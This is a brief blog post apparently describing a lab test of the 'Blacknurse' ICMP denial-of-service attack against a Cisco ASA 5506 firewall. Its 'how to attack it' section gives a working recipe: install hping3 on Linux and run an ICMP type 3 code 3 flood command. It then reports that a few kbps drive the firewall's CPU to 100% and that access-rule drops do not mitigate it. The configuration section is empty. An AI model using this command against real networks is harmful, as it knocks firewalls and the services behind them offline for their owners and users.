Blacknurse DoS attack on Cisco ASA

Cisco ASA config:


How to attack it:
1. Get a ubuntu or any Linux server, install hping3 (apt-get install hping3)
2. attack it:
hping3 -1 -C 3 -K 3 -i u20

Monitoring from Cisco ASA ASDM, the CPU load spike to 100% in just few second time,
and services in the inside zone start to have packet lost to outside zone, and the attacking Ubuntu is just sending 5kbps of traffic:

ICMP type 3 has been set in access rule to drop but do not mitigate the issue,
sadly Cisco is not going to patch this, the only way to solve this is just to replace the ASA 5506…

Related Posts
Leave a Reply

Your email address will not be published.Required fields are marked *